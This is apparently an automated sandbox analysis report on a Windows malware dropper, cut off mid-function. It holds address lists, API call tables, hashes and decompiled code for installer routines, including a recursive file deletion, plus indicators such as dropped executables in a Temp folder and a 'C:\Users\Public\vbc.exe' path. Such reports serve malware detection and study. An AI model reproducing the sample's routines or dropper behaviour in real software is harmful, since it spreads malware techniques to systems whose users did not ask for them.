                                                                                                                                                                                                              0x00404904
                                                                                                                                                                                                              0x00404912
                                                                                                                                                                                                              0x00404919
                                                                                                                                                                                                              0x00404920
                                                                                                                                                                                                              0x00404923
                                                                                                                                                                                                              0x0040495a
                                                                                                                                                                                                              0x0040495c
                                                                                                                                                                                                              0x00404962
                                                                                                                                                                                                              0x00404967
                                                                                                                                                                                                              0x0040496b
                                                                                                                                                                                                              0x0040496d
                                                                                                                                                                                                              0x0040496d
                                                                                                                                                                                                              0x00404989
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x0040498b
                                                                                                                                                                                                              0x0040498e
                                                                                                                                                                                                              0x0040499c
                                                                                                                                                                                                              0x004049a2
                                                                                                                                                                                                              0x004049a3
                                                                                                                                                                                                              0x004049a6
                                                                                                                                                                                                              0x004049a9
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x004049a9
                                                                                                                                                                                                              0x00404925
                                                                                                                                                                                                              0x00404927
                                                                                                                                                                                                              0x0040492b
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x0040492d
                                                                                                                                                                                                              0x0040492d
                                                                                                                                                                                                              0x0040493a
                                                                                                                                                                                                              0x0040493f
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00404943
                                                                                                                                                                                                              0x00404945
                                                                                                                                                                                                              0x00404945
                                                                                                                                                                                                              0x0040494d
                                                                                                                                                                                                              0x0040494f
                                                                                                                                                                                                              0x00404952
                                                                                                                                                                                                              0x00404955
                                                                                                                                                                                                              0x00404958
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00404958
                                                                                                                                                                                                              0x004049b5
                                                                                                                                                                                                              0x004049bf
                                                                                                                                                                                                              0x004049c2
                                                                                                                                                                                                              0x004049c5
                                                                                                                                                                                                              0x004049cc
                                                                                                                                                                                                              0x004049cc
                                                                                                                                                                                                              0x004049ce
                                                                                                                                                                                                              0x004049ce
                                                                                                                                                                                                              0x004049d3
                                                                                                                                                                                                              0x004049d5
                                                                                                                                                                                                              0x004049dd
                                                                                                                                                                                                              0x004049e4
                                                                                                                                                                                                              0x004049e6
                                                                                                                                                                                                              0x004049f1
                                                                                                                                                                                                              0x004049f1
                                                                                                                                                                                                              0x004049e6
                                                                                                                                                                                                              0x004049f8
                                                                                                                                                                                                              0x00404a01
                                                                                                                                                                                                              0x00404a0b
                                                                                                                                                                                                              0x00404a13
                                                                                                                                                                                                              0x00404a2e
                                                                                                                                                                                                              0x00404a15
                                                                                                                                                                                                              0x00404a1e
                                                                                                                                                                                                              0x00404a1e
                                                                                                                                                                                                              0x00404a13
                                                                                                                                                                                                              0x00404a33
                                                                                                                                                                                                              0x00404a38
                                                                                                                                                                                                              0x00404a3d
                                                                                                                                                                                                              0x00404a46
                                                                                                                                                                                                              0x00404a46
                                                                                                                                                                                                              0x00404a4f
                                                                                                                                                                                                              0x00404a51
                                                                                                                                                                                                              0x00404a51
                                                                                                                                                                                                              0x00404a5d
                                                                                                                                                                                                              0x00404a65
                                                                                                                                                                                                              0x00404a6f
                                                                                                                                                                                                              0x00404a6f
                                                                                                                                                                                                              0x00404a74
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00404a74
                                                                                                                                                                                                              0x00404923
                                                                                                                                                                                                              0x004048da
                                                                                                                                                                                                              0x004048e1
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x004048e1
                                                                                                                                                                                                              0x00404800
                                                                                                                                                                                                              0x00404809
                                                                                                                                                                                                              0x00404823
                                                                                                                                                                                                              0x00404828
                                                                                                                                                                                                              0x00404832
                                                                                                                                                                                                              0x00404839
                                                                                                                                                                                                              0x00404845
                                                                                                                                                                                                              0x00404848
                                                                                                                                                                                                              0x0040484b
                                                                                                                                                                                                              0x00404852
                                                                                                                                                                                                              0x0040485a
                                                                                                                                                                                                              0x0040485d
                                                                                                                                                                                                              0x00404861
                                                                                                                                                                                                              0x00404868
                                                                                                                                                                                                              0x00404870
                                                                                                                                                                                                              0x004048ca
                                                                                                                                                                                                              0x00404872
                                                                                                                                                                                                              0x00404873
                                                                                                                                                                                                              0x0040487a
                                                                                                                                                                                                              0x00404884
                                                                                                                                                                                                              0x0040488c
                                                                                                                                                                                                              0x00404899
                                                                                                                                                                                                              0x004048ad
                                                                                                                                                                                                              0x004048b1
                                                                                                                                                                                                              0x004048b1
                                                                                                                                                                                                              0x004048ad
                                                                                                                                                                                                              0x004048b6
                                                                                                                                                                                                              0x004048c3
                                                                                                                                                                                                              0x004048c3
                                                                                                                                                                                                              0x00404870
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00404828
                                                                                                                                                                                                              0x00404816
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x0040481c
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00404787
                                                                                                                                                                                                              0x00404794
                                                                                                                                                                                                              0x0040479d
                                                                                                                                                                                                              0x004047aa
                                                                                                                                                                                                              0x004047aa
                                                                                                                                                                                                              0x004047b1
                                                                                                                                                                                                              0x004047b7
                                                                                                                                                                                                              0x004047c0
                                                                                                                                                                                                              0x004047c3
                                                                                                                                                                                                              0x004047c6
                                                                                                                                                                                                              0x004047ce
                                                                                                                                                                                                              0x004047d1
                                                                                                                                                                                                              0x004047d4
                                                                                                                                                                                                              0x004047da
                                                                                                                                                                                                              0x004047e1
                                                                                                                                                                                                              0x004047e8
                                                                                                                                                                                                              0x00404a7a
                                                                                                                                                                                                              0x00404a8c
                                                                                                                                                                                                              0x004047ee
                                                                                                                                                                                                              0x004047f1
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x004047f1
                                                                                                                                                                                                              0x004047e8

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetDlgItem.USER32(?,000003FB), ref: 0040478D
                                                                                                                                                                                                              • SetWindowTextA.USER32(00000000,?), ref: 004047B7
                                                                                                                                                                                                              • SHBrowseForFolderA.SHELL32(?,00420128,?), ref: 00404868
                                                                                                                                                                                                              • CoTaskMemFree.OLE32(00000000), ref: 00404873
                                                                                                                                                                                                              • lstrcmpiA.KERNEL32(C:\Users\user\AppData\Local\Temp\Nla\acqyswhf.exe C:\Users\user\AppData\Local\Temp\Nla\invbat.p,00420D50,00000000,?,?), ref: 004048A5
                                                                                                                                                                                                              • lstrcatA.KERNEL32(?,C:\Users\user\AppData\Local\Temp\Nla\acqyswhf.exe C:\Users\user\AppData\Local\Temp\Nla\invbat.p), ref: 004048B1
                                                                                                                                                                                                              • SetDlgItemTextA.USER32(?,000003FB,?), ref: 004048C3
                                                                                                                                                                                                                • Part of subcall function 00405928: GetDlgItemTextA.USER32 ref: 0040593B
                                                                                                                                                                                                                • Part of subcall function 00406503: CharNextA.USER32(?), ref: 0040655B
                                                                                                                                                                                                                • Part of subcall function 00406503: CharNextA.USER32(?), ref: 00406568
                                                                                                                                                                                                                • Part of subcall function 00406503: CharNextA.USER32(?), ref: 0040656D
                                                                                                                                                                                                                • Part of subcall function 00406503: CharPrevA.USER32(?,?), ref: 0040657D
                                                                                                                                                                                                              • GetDiskFreeSpaceA.KERNEL32(0041FD20,?,?,0000040F,?,0041FD20,0041FD20,?,00000001,0041FD20,?,?,000003FB,?), ref: 00404981
                                                                                                                                                                                                              • MulDiv.KERNEL32 ref: 0040499C
                                                                                                                                                                                                                • Part of subcall function 00404AF5: lstrlenA.KERNEL32(00420D50,00420D50,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,00404A10,000000DF,00000000,00000400,?), ref: 00404B93
                                                                                                                                                                                                                • Part of subcall function 00404AF5: wsprintfA.USER32 ref: 00404B9B
                                                                                                                                                                                                                • Part of subcall function 00404AF5: SetDlgItemTextA.USER32(?,00420D50), ref: 00404BAE
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000004.00000002.2181022319.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000004.00000002.2181017810.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000004.00000002.2181028739.0000000000408000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000004.00000002.2181033509.000000000040A000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000004.00000002.2181041314.0000000000423000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000004.00000002.2181045047.000000000042A000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000004.00000002.2181050062.000000000042D000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                                                                                                                                                                                              • String ID: A$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\Nla\acqyswhf.exe C:\Users\user\AppData\Local\Temp\Nla\invbat.p$PB
                                                                                                                                                                                                              • API String ID: 2624150263-3716991820
                                                                                                                                                                                                              • Opcode ID: 5adcc52e68fc45daf65e39649d90cf7ffccb25418fea71ff199c700a68887fff
                                                                                                                                                                                                              • Instruction ID: 829ad80b7ad659a1b6830b16dd2e7c43b5ac75723c1b4fdd6e47fb9b3f087a68
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5adcc52e68fc45daf65e39649d90cf7ffccb25418fea71ff199c700a68887fff
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 48A18FB1A00209ABDB11EFA5DD45AAF7BB8EF84314F10843BF601B62D1D77C99418B6D
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              C-Code - Quality: 98%
                                                                                                                                                                                                              			E004059F0(void* __eflags, signed int _a4, signed int _a8) {
                                                                                                                                                                                                              				signed int _v8;
                                                                                                                                                                                                              				void* _v12;
                                                                                                                                                                                                              				signed int _v16;
                                                                                                                                                                                                              				struct _WIN32_FIND_DATAA _v336;
                                                                                                                                                                                                              				signed int _t40;
                                                                                                                                                                                                              				char* _t53;
                                                                                                                                                                                                              				signed int _t55;
                                                                                                                                                                                                              				signed int _t58;
                                                                                                                                                                                                              				signed int _t64;
                                                                                                                                                                                                              				signed int _t66;
                                                                                                                                                                                                              				void* _t68;
                                                                                                                                                                                                              				signed char _t69;
                                                                                                                                                                                                              				CHAR* _t71;
                                                                                                                                                                                                              				void* _t72;
                                                                                                                                                                                                              				CHAR* _t73;
                                                                                                                                                                                                              				char* _t76;
                                                                                                                                                                                                              
                                                                                                                                                                                                              				_t69 = _a8;
                                                                                                                                                                                                              				_t73 = _a4;
                                                                                                                                                                                                              				_v8 = _t69 & 0x00000004;
                                                                                                                                                                                                              				_t40 = E00405CAE(__eflags, _t73);
                                                                                                                                                                                                              				_v16 = _t40;
                                                                                                                                                                                                              				if((_t69 & 0x00000008) != 0) {
                                                                                                                                                                                                              					_t66 = DeleteFileA(_t73);
                                                                                                                                                                                                              					asm("sbb eax, eax");
                                                                                                                                                                                                              					_t68 =  ~_t66 + 1;
                                                                                                                                                                                                              					 *0x4247e8 =  *0x4247e8 + _t68;
                                                                                                                                                                                                              					return _t68;
                                                                                                                                                                                                              				}
                                                                                                                                                                                                              				_a4 = _t69;
                                                                                                                                                                                                              				_t8 =  &_a4;
                                                                                                                                                                                                              				 *_t8 = _a4 & 0x00000001;
                                                                                                                                                                                                              				__eflags =  *_t8;
                                                                                                                                                                                                              				if( *_t8 == 0) {
                                                                                                                                                                                                              					L5:
                                                                                                                                                                                                              					E00406228(0x421d58, _t73);
                                                                                                                                                                                                              					__eflags = _a4;
                                                                                                                                                                                                              					if(_a4 == 0) {
                                                                                                                                                                                                              						E00405C07(_t73);
                                                                                                                                                                                                              					} else {
                                                                                                                                                                                                              						lstrcatA(0x421d58, "\*.*");
                                                                                                                                                                                                              					}
                                                                                                                                                                                                              					__eflags =  *_t73;
                                                                                                                                                                                                              					if( *_t73 != 0) {
                                                                                                                                                                                                              						L10:
                                                                                                                                                                                                              						lstrcatA(_t73, 0x40a014);
                                                                                                                                                                                                              						L11:
                                                                                                                                                                                                              						_t71 =  &(_t73[lstrlenA(_t73)]);
                                                                                                                                                                                                              						_t40 = FindFirstFileA(0x421d58,  &_v336);
                                                                                                                                                                                                              						__eflags = _t40 - 0xffffffff;
                                                                                                                                                                                                              						_v12 = _t40;
                                                                                                                                                                                                              						if(_t40 == 0xffffffff) {
                                                                                                                                                                                                              							L29:
                                                                                                                                                                                                              							__eflags = _a4;
                                                                                                                                                                                                              							if(_a4 != 0) {
                                                                                                                                                                                                              								_t32 = _t71 - 1;
                                                                                                                                                                                                              								 *_t32 =  *(_t71 - 1) & 0x00000000;
                                                                                                                                                                                                              								__eflags =  *_t32;
                                                                                                                                                                                                              							}
                                                                                                                                                                                                              							goto L31;
                                                                                                                                                                                                              						} else {
                                                                                                                                                                                                              							goto L12;
                                                                                                                                                                                                              						}
                                                                                                                                                                                                              						do {
                                                                                                                                                                                                              							L12:
                                                                                                                                                                                                              							_t76 =  &(_v336.cFileName);
                                                                                                                                                                                                              							_t53 = E00405BEB( &(_v336.cFileName), 0x3f);
                                                                                                                                                                                                              							__eflags =  *_t53;
                                                                                                                                                                                                              							if( *_t53 != 0) {
                                                                                                                                                                                                              								__eflags = _v336.cAlternateFileName;
                                                                                                                                                                                                              								if(_v336.cAlternateFileName != 0) {
                                                                                                                                                                                                              									_t76 =  &(_v336.cAlternateFileName);
                                                                                                                                                                                                              								}
                                                                                                                                                                                                              							}
                                                                                                                                                                                                              							__eflags =  *_t76 - 0x2e;
                                                                                                                                                                                                              							if( *_t76 != 0x2e) {
                                                                                                                                                                                                              								L19:
                                                                                                                                                                                                              								E00406228(_t71, _t76);
                                                                                                                                                                                                              								__eflags = _v336.dwFileAttributes & 0x00000010;
                                                                                                                                                                                                              								if(__eflags == 0) {
                                                                                                                                                                                                              									_t55 = E004059A8(__eflags, _t73, _v8);
                                                                                                                                                                                                              									__eflags = _t55;
                                                                                                                                                                                                              									if(_t55 != 0) {
                                                                                                                                                                                                              										E0040534F(0xfffffff2, _t73);
                                                                                                                                                                                                              									} else {
                                                                                                                                                                                                              										__eflags = _v8 - _t55;
                                                                                                                                                                                                              										if(_v8 == _t55) {
                                                                                                                                                                                                              											 *0x4247e8 =  *0x4247e8 + 1;
                                                                                                                                                                                                              										} else {
                                                                                                                                                                                                              											E0040534F(0xfffffff1, _t73);
                                                                                                                                                                                                              											E00406007(_t72, _t73, 0);
                                                                                                                                                                                                              										}
                                                                                                                                                                                                              									}
                                                                                                                                                                                                              								} else {
                                                                                                                                                                                                              									__eflags = (_a8 & 0x00000003) - 3;
                                                                                                                                                                                                              									if(__eflags == 0) {
                                                                                                                                                                                                              										E004059F0(__eflags, _t73, _a8);
                                                                                                                                                                                                              									}
                                                                                                                                                                                                              								}
                                                                                                                                                                                                              								goto L27;
                                                                                                                                                                                                              							}
                                                                                                                                                                                                              							_t64 =  *((intOrPtr*)(_t76 + 1));
                                                                                                                                                                                                              							__eflags = _t64;
                                                                                                                                                                                                              							if(_t64 == 0) {
                                                                                                                                                                                                              								goto L27;
                                                                                                                                                                                                              							}
                                                                                                                                                                                                              							__eflags = _t64 - 0x2e;
                                                                                                                                                                                                              							if(_t64 != 0x2e) {
                                                                                                                                                                                                              								goto L19;
                                                                                                                                                                                                              							}
                                                                                                                                                                                                              							__eflags =  *((char*)(_t76 + 2));
                                                                                                                                                                                                              							if( *((char*)(_t76 + 2)) == 0) {
                                                                                                                                                                                                              								goto L27;
                                                                                                                                                                                                              							}
                                                                                                                                                                                                              							goto L19;
                                                                                                                                                                                                              							L27:
                                                                                                                                                                                                              							_t58 = FindNextFileA(_v12,  &_v336);
                                                                                                                                                                                                              							__eflags = _t58;
                                                                                                                                                                                                              						} while (_t58 != 0);
                                                                                                                                                                                                              						_t40 = FindClose(_v12);
                                                                                                                                                                                                              						goto L29;
                                                                                                                                                                                                              					}
                                                                                                                                                                                                              					__eflags =  *0x421d58 - 0x5c;
                                                                                                                                                                                                              					if( *0x421d58 != 0x5c) {
                                                                                                                                                                                                              						goto L11;
                                                                                                                                                                                                              					}
                                                                                                                                                                                                              					goto L10;
                                                                                                                                                                                                              				} else {
                                                                                                                                                                                                              					__eflags = _t40;
                                                                                                                                                                                                              					if(_t40 == 0) {
                                                                                                                                                                                                              						L31:
                                                                                                                                                                                                              						__eflags = _a4;
                                                                                                                                                                                                              						if(_a4 == 0) {
                                                                                                                                                                                                              							L39:
                                                                                                                                                                                                              							return _t40;
                                                                                                                                                                                                              						}
                                                                                                                                                                                                              						__eflags = _v16;
                                                                                                                                                                                                              						if(_v16 != 0) {
                                                                                                                                                                                                              							_t40 = E0040659C(_t73);
                                                                                                                                                                                                              							__eflags = _t40;
                                                                                                                                                                                                              							if(_t40 == 0) {
                                                                                                                                                                                                              								goto L39;
                                                                                                                                                                                                              							}
                                                                                                                                                                                                              							E00405BC0(_t73);
                                                                                                                                                                                                              							_t40 = E004059A8(__eflags, _t73, _v8 | 0x00000001);
                                                                                                                                                                                                              							__eflags = _t40;
                                                                                                                                                                                                              							if(_t40 != 0) {
                                                                                                                                                                                                              								return E0040534F(0xffffffe5, _t73);
                                                                                                                                                                                                              							}
                                                                                                                                                                                                              							__eflags = _v8;
                                                                                                                                                                                                              							if(_v8 == 0) {
                                                                                                                                                                                                              								goto L33;
                                                                                                                                                                                                              							}
                                                                                                                                                                                                              							E0040534F(0xfffffff1, _t73);
                                                                                                                                                                                                              							return E00406007(_t72, _t73, 0);
                                                                                                                                                                                                              						}
                                                                                                                                                                                                              						L33:
                                                                                                                                                                                                              						 *0x4247e8 =  *0x4247e8 + 1;
                                                                                                                                                                                                              						return _t40;
                                                                                                                                                                                                              					}
                                                                                                                                                                                                              					__eflags = _t69 & 0x00000002;
                                                                                                                                                                                                              					if((_t69 & 0x00000002) == 0) {
                                                                                                                                                                                                              						goto L31;
                                                                                                                                                                                                              					}
                                                                                                                                                                                                              					goto L5;
                                                                                                                                                                                                              				}
                                                                                                                                                                                                              			}



















                                                                                                                                                                                                              0x004059fa
                                                                                                                                                                                                              0x004059ff
                                                                                                                                                                                                              0x00405a08
                                                                                                                                                                                                              0x00405a0b
                                                                                                                                                                                                              0x00405a13
                                                                                                                                                                                                              0x00405a16
                                                                                                                                                                                                              0x00405a19
                                                                                                                                                                                                              0x00405a21
                                                                                                                                                                                                              0x00405a23
                                                                                                                                                                                                              0x00405a24
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00405a24
                                                                                                                                                                                                              0x00405a2f
                                                                                                                                                                                                              0x00405a32
                                                                                                                                                                                                              0x00405a32
                                                                                                                                                                                                              0x00405a32
                                                                                                                                                                                                              0x00405a36
                                                                                                                                                                                                              0x00405a49
                                                                                                                                                                                                              0x00405a50
                                                                                                                                                                                                              0x00405a55
                                                                                                                                                                                                              0x00405a59
                                                                                                                                                                                                              0x00405a69
                                                                                                                                                                                                              0x00405a5b
                                                                                                                                                                                                              0x00405a61
                                                                                                                                                                                                              0x00405a61
                                                                                                                                                                                                              0x00405a6e
                                                                                                                                                                                                              0x00405a71
                                                                                                                                                                                                              0x00405a7c
                                                                                                                                                                                                              0x00405a82
                                                                                                                                                                                                              0x00405a87
                                                                                                                                                                                                              0x00405a97
                                                                                                                                                                                                              0x00405a99
                                                                                                                                                                                                              0x00405a9f
                                                                                                                                                                                                              0x00405aa2
                                                                                                                                                                                                              0x00405aa5
                                                                                                                                                                                                              0x00405b5d
                                                                                                                                                                                                              0x00405b5d
                                                                                                                                                                                                              0x00405b61
                                                                                                                                                                                                              0x00405b63
                                                                                                                                                                                                              0x00405b63
                                                                                                                                                                                                              0x00405b63
                                                                                                                                                                                                              0x00405b63
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00405aab
                                                                                                                                                                                                              0x00405aab
                                                                                                                                                                                                              0x00405ab4
                                                                                                                                                                                                              0x00405aba
                                                                                                                                                                                                              0x00405abf
                                                                                                                                                                                                              0x00405ac2
                                                                                                                                                                                                              0x00405ac4
                                                                                                                                                                                                              0x00405ac8
                                                                                                                                                                                                              0x00405aca
                                                                                                                                                                                                              0x00405aca
                                                                                                                                                                                                              0x00405ac8
                                                                                                                                                                                                              0x00405acd
                                                                                                                                                                                                              0x00405ad0
                                                                                                                                                                                                              0x00405ae3
                                                                                                                                                                                                              0x00405ae5
                                                                                                                                                                                                              0x00405aea
                                                                                                                                                                                                              0x00405af1
                                                                                                                                                                                                              0x00405b0c
                                                                                                                                                                                                              0x00405b11
                                                                                                                                                                                                              0x00405b13
                                                                                                                                                                                                              0x00405b37
                                                                                                                                                                                                              0x00405b15
                                                                                                                                                                                                              0x00405b15
                                                                                                                                                                                                              0x00405b18
                                                                                                                                                                                                              0x00405b2c
                                                                                                                                                                                                              0x00405b1a
                                                                                                                                                                                                              0x00405b1d
                                                                                                                                                                                                              0x00405b25
                                                                                                                                                                                                              0x00405b25
                                                                                                                                                                                                              0x00405b18
                                                                                                                                                                                                              0x00405af3
                                                                                                                                                                                                              0x00405af9
                                                                                                                                                                                                              0x00405afb
                                                                                                                                                                                                              0x00405b01
                                                                                                                                                                                                              0x00405b01
                                                                                                                                                                                                              0x00405afb
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00405af1
                                                                                                                                                                                                              0x00405ad2
                                                                                                                                                                                                              0x00405ad5
                                                                                                                                                                                                              0x00405ad7
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00405ad9
                                                                                                                                                                                                              0x00405adb
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00405add
                                                                                                                                                                                                              0x00405ae1
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00405b3c
                                                                                                                                                                                                              0x00405b46
                                                                                                                                                                                                              0x00405b4c
                                                                                                                                                                                                              0x00405b4c
                                                                                                                                                                                                              0x00405b57
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00405b57
                                                                                                                                                                                                              0x00405a73
                                                                                                                                                                                                              0x00405a7a
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00405a38
                                                                                                                                                                                                              0x00405a38
                                                                                                                                                                                                              0x00405a3a
                                                                                                                                                                                                              0x00405b67
                                                                                                                                                                                                              0x00405b69
                                                                                                                                                                                                              0x00405b6c
                                                                                                                                                                                                              0x00405bbd
                                                                                                                                                                                                              0x00405bbd
                                                                                                                                                                                                              0x00405bbd
                                                                                                                                                                                                              0x00405b6e
                                                                                                                                                                                                              0x00405b71
                                                                                                                                                                                                              0x00405b7c
                                                                                                                                                                                                              0x00405b81
                                                                                                                                                                                                              0x00405b83
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00405b86
                                                                                                                                                                                                              0x00405b92
                                                                                                                                                                                                              0x00405b97
                                                                                                                                                                                                              0x00405b99
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00405bb4
                                                                                                                                                                                                              0x00405b9b
                                                                                                                                                                                                              0x00405b9e
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00405ba3
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00405baa
                                                                                                                                                                                                              0x00405b73
                                                                                                                                                                                                              0x00405b73
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00405b73
                                                                                                                                                                                                              0x00405a40
                                                                                                                                                                                                              0x00405a43
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                              0x00405a43

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • DeleteFileA.KERNEL32(?,?,76712754,766F13E0,00000000), ref: 00405A19
                                                                                                                                                                                                              • lstrcatA.KERNEL32(00421D58,\*.*,00421D58,?,?,76712754,766F13E0,00000000), ref: 00405A61
                                                                                                                                                                                                              • lstrcatA.KERNEL32(?,0040A014,?,00421D58,?,?,76712754,766F13E0,00000000), ref: 00405A82
                                                                                                                                                                                                              • lstrlenA.KERNEL32(?,?,0040A014,?,00421D58,?,?,76712754,766F13E0,00000000), ref: 00405A88
                                                                                                                                                                                                              • FindFirstFileA.KERNEL32(00421D58,?,?,?,0040A014,?,00421D58,?,?,76712754,766F13E0,00000000), ref: 00405A99
                                                                                                                                                                                                              • FindNextFileA.KERNEL32(00000000,00000010,000000F2,?,?,?,00000000,?,?,0000003F), ref: 00405B46
                                                                                                                                                                                                              • FindClose.KERNEL32(00000000), ref: 00405B57
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000004.00000002.2181022319.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000004.00000002.2181017810.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000004.00000002.2181028739.0000000000408000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000004.00000002.2181033509.000000000040A000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000004.00000002.2181041314.0000000000423000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000004.00000002.2181045047.000000000042A000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                              • Associated: 00000004.00000002.2181050062.000000000042D000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                                                                                                                                                              • String ID: "C:\Users\Public\vbc.exe" $\*.*
                                                                                                                                                                                                              • API String ID: 2035342205-1024247051
                                                                                                                                                                                                              • Opcode ID: e0a9e3feedf786db3519a046742172e8048bcfaf00ecfdfd1d80b1414f5b56fa
                                                                                                                                                                                                              • Instruction ID: f9fcd54ed45cecb295d84a7a00b3a90cccdf7efad1d91ba0bada197ffcbf79f0
                                                                                                                                                                                                              • Opcode Fuzzy Hash: e0a9e3feedf786db3519a046742172e8048bcfaf00ecfdfd1d80b1414f5b56fa
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0851C430900A44AADB21AB658C85BBF7A78DF42714F14417FF851711D2C77C7A82DE69
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              C-Code - Quality: 74%
                                                                                                                                                                                                              			E0040216B(void* __eflags) {
                                                                                                                                                                                                              				signed int _t55;
                                                                                                                                                                                                              				void* _t59;
                                                                                                                                                                                                              				intOrPtr* _t63;
                                                                                                                                                                                                              				intOrPtr _t64;
                                                                                                                                                                                                              				intOrPtr* _t65;
                                                                                                                                                                                                              				intOrPtr* _t67;
                                                                                                                                                                                                              				intOrPtr* _t69;
                                                                                                                                                                                                              				intOrPtr* _t71;
                                                                                                                                                                                                              				intOrPtr* _t73;
                                                                                                                                                                                                              				intOrPtr* _t75;
                                                                                                                                                                                                              				intOrPtr* _t78;
                                                                                                                                                                                                              				intOrPtr* _t80;
                                                                                                                                                                                                              				intOrPtr* _t82;
                                                                                                                                                                                                              				intOrPtr* _t84;
                                                                                                                                                                                                              				int _t87;
                                                                                                                                                                                                              				intOrPtr* _t95;
                                                                                                                                                                                                              				signed int _t105;
                                                                                                                                                                                                              				signed int _t109;
                                                                                                                                                                                                              				void* _t111;
                                                                                                                                                                                                              
                                                                                                                                                                                                              				 *(_t111 - 0x38) = E00402BCE(0xfffffff0);
                                                                                                                                                                                                              				 *(_t111 - 0xc) = E00402BCE(0xffffffdf);
                                                                                                                                                                                                              				 *((intOrPtr*)(_t111 - 0x88)) = E00402BCE(2);
                                                                                                                                                                                                              				 *((intOrPtr*)(_t111 - 0x34)) = E00402BCE(0xffffffcd);
                                                                                                                                                                                                              				 *((intOrPtr*)(_t111 - 0x78)) = E00402BCE(0x45);
                                                                                                                                                                                                              				_t55 =  *(_t111 - 0x18);
                                                                                                                                                                                                              				 *(_t111 - 0x90) = _t55 & 0x00000fff;
                                                                                                                                                                                                              				_t105 = _t55 & 0x00008000;
                                                                                                                                                                                                              				_t109 = _t55 >> 0x0000000c & 0x00000007;
                                                                                                                                                                                                              				 *(_t111 - 0x74) = _t55 >> 0x00000010 & 0x0000ffff;
                                                                                                                                                                                                              				if(E00405C2D( *(_t111 - 0xc)) == 0) {
                                                                                                                                                                                                              					E00402BCE(0x21);
                                                                                                                                                                                                              				}
                                                                                                                                                                                                              				_t59 = _t111 + 8;
                                                                                                                                                                                                              				__imp__CoCreateInstance(0x408418, _t87, 1, 0x408408, _t59);
                                                                                                                                                                                                              				if(_t59 < _t87) {
                                                                                                                                                                                                              					L15:
                                                                                                                                                                                                              					 *((intOrPtr*)(_t111 - 4)) = 1;
                                                                                                                                                                                                              					_push(0xfffffff0);
                                                                                                                                                                                                              				} else {
